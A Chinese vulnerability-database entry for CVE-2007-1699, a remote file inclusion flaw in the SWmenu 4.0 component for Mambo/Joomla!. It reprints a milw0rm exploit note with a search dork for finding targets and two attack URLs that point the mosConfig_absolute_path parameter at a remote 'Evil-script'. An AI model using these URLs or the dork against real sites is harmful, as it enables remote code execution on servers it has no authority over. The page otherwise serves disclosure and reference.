Mambo/Joomla! SWmenu 组件 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112527 漏洞类型 输入验证
发布时间 2007-03-23 更新时间 2007-03-28
CVE编号 CVE-2007-1699 CNNVD-ID CNNVD-200703-621
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3557
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-621
|漏洞详情
MamboandJoomla!SWmenu(com_swmenuproandcom_swmenufree)组件4.0中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到ImageManager/Classes/ImageManager.php的mosConfig_absolute_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file :  /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork :  index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
#           Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
#                 Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
             All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]
|参考资料

来源:BID
名称:23116
链接:http://www.securityfocus.com/bid/23116
来源:MILW0RM
名称:3557
链接:http://www.milw0rm.com/exploits/3557
来源:OSVDB
名称:38791
链接:http://osvdb.org/38791
来源:OSVDB
名称:38790
链接:http://osvdb.org/38790
来源:XF
名称:swmenufree-imagemanager-file-include(33204)
链接:http://xforce.iss.net/xforce/xfdb/33204
来源:VUPEN
名称:ADV-2007-1100
链接:http://www.frsirt.com/english/advisories/2007/1100